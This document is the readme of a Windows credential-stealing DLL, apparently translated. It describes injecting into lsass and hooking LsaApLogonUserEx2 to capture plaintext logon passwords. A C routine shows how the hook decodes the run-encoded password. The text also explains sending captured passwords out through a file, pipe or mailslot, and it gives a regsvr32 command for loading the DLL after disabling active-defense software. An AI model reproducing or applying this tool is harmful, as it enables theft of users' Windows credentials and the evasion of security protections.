Windows authentication ultimately passes through the lsass process. The default authentication package is msv1_0.dll, and the key function among its exports is LsaApLogonUserEx2. This program injects code into lsass and hooks LsaApLogonUserEx2 to intercept passwords. LsaApLogonUserEx2 is triggered whenever an authentication takes place, which includes IPC$ connections, runas, and 3389 Remote Desktop logons.
The program handles the differences between platforms itself; interception works on 2000, 2003, XP and Vista.
On 2000, 2003 and XP the password arrives encoded: the XOR seed is stored in the high eight bits of UNICODE_STRING.Length, and the password is decoded with ntdll.RtlRunDecodeUnicodeString.
On Vista, AdvApi32.CredIsProtectedW is used to determine whether the password is encoded, and it is decoded with AdvApi32.CredUnprotectW.
You can attach a debugger to lsass and look around.
:)
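Added example (my own, not code from this tool): the 2000/2003/XP encoding described above, written out end to end. One side does what Winlogon does before it hands the logon information to LSA (run-encode the password, park the seed in the high byte of UNICODE_STRING.Length); the other side does what a hook on LsaApLogonUserEx2 has to do to get the plaintext back (pull the seed out, restore Length, run-decode). The XOR scheme follows the ReactOS reimplementation of RtlRunEncodeUnicodeString / RtlRunDecodeUnicodeString; that it is byte-exact with Windows is an assumption, and the seed value and sample password are constructed. It is plain portable C, so it builds without Windows headers. The Vista CredUnprotectW path is a Windows-only API and is not shown.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal stand-in for the Windows UNICODE_STRING: Length and MaximumLength
 * are byte counts, Buffer is UTF-16LE without a terminating NUL. */
typedef struct {
    uint16_t  Length;
    uint16_t  MaximumLength;
    uint16_t *Buffer;
} UNICODE_STRING_LITE;

/* ntdll.RtlRunEncodeUnicodeString as reimplemented by ReactOS (assumption:
 * byte-exact with Windows): the first byte is XORed with seed|0x43, every
 * later byte with the previous *encoded* byte and the seed.  Windows picks
 * a random nonzero seed when *seed == 0; a constructed constant stands in. */
static void run_encode(uint8_t *seed, UNICODE_STRING_LITE *s)
{
    uint8_t *p = (uint8_t *)s->Buffer;
    uint16_t n = s->Length;
    if (*seed == 0) *seed = 0x5a;        /* constructed seed for this example */
    if (n == 0) return;
    p[0] ^= (uint8_t)(*seed | 0x43);
    for (uint16_t i = 1; i < n; i++)
        p[i] ^= p[i - 1] ^ *seed;
}

/* ntdll.RtlRunDecodeUnicodeString: walk backwards so p[i-2] is still the
 * encoded value when it is used, then undo the first-byte XOR. */
static void run_decode(uint8_t seed, UNICODE_STRING_LITE *s)
{
    uint8_t *p = (uint8_t *)s->Buffer;
    uint16_t n = s->Length;
    if (n == 0) return;
    for (uint16_t i = n; i > 1; i--)
        p[i - 1] ^= p[i - 2] ^ seed;
    p[0] ^= (uint8_t)(seed | 0x43);
}

/* Producer side (Winlogon, before the LSA call): encode in place and stash
 * the seed in the high byte of Length.  The low byte keeps the real byte
 * length, so the password must be under 128 UTF-16 code units. */
static void protect_password(UNICODE_STRING_LITE *pw)
{
    uint8_t seed = 0;
    run_encode(&seed, pw);
    pw->Length = (uint16_t)((pw->Length & 0xff) | (seed << 8));
}

/* Consumer side (a hook on msv1_0!LsaApLogonUserEx2): recover the seed
 * from the high byte of Length, restore Length, decode in place. */
static void unprotect_password(UNICODE_STRING_LITE *pw)
{
    uint8_t seed = (uint8_t)(pw->Length >> 8);
    pw->Length &= 0xff;
    run_decode(seed, pw);
}

/* Round trip for an ASCII password (constructed driver for this example).
 * Returns 1 if the seed really lands in the high byte, the bytes really
 * change, and the hook side gets the exact plaintext back; 0 otherwise. */
int password_roundtrip_ok(const char *password)
{
    uint16_t buf[127], plain[127];
    size_t n = strlen(password);
    if (n == 0 || n > 127) return 0;
    for (size_t i = 0; i < n; i++) buf[i] = (uint8_t)password[i];
    memcpy(plain, buf, n * 2);

    UNICODE_STRING_LITE pw = { (uint16_t)(n * 2), (uint16_t)sizeof buf, buf };
    protect_password(&pw);
    if ((size_t)(pw.Length & 0xff) != n * 2) return 0;  /* real length kept   */
    if ((pw.Length >> 8) == 0) return 0;                 /* seed was stored    */
    if (memcmp(plain, buf, n * 2) == 0) return 0;        /* bytes were changed */

    unprotect_password(&pw);
    if ((size_t)pw.Length != n * 2) return 0;            /* Length restored    */
    return memcmp(plain, buf, n * 2) == 0;               /* plaintext back     */
}

int main(void)
{
    const char *pw = "P@ssw0rd!";   /* constructed sample password */
    printf("%s: %s\n", pw, password_roundtrip_ok(pw) ? "recovered" : "FAILED");
    return 0;
}
```

The point a hook author cares about is in unprotect_password: if you read the password bytes before stripping the seed out of Length you will both over-read the buffer and decode with the wrong key, which is why the text singles out the high eight bits of Length.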
======== Interface:
HRESULT WINAPI DllInstall(BOOL bInstall, LPCWSTR pszCmdLine);
This is the prototype of the function exported by the dll. Don't be fooled by the name: this program is "green" (portable).
The function does not perform any install action at startup and does not modify the registry or system files. The name was chosen only so that regsvr32 can call it through a standard interface.
The first parameter is unused.
The second parameter specifies a file path (note: UNICODE);
the recorded data will be saved there (as ANSI).
The file path can be something like C:\x.log,
or \\.\Pipe\your_pipename, or \\.\Mailslot\yourslot.
That means you can write your own loader to call the dll, so that the dll sends the intercepted password data to your program through the pipe or mailslot. The data is a string (ANSI).
======== Test:
If you don't want to write your own loader, you can use regsvr32 as the loader to test it (you may need to close some active-defense software first):
regsvr32 /n /i:c:\xxx.log c:\pluginWinPswLogger.dll
If everything is normal, regsvr32 pops up a success prompt.
Now switch user or lock the computer and log back in; the program will intercept the password and save it to c:\xxx.log.
========= Finish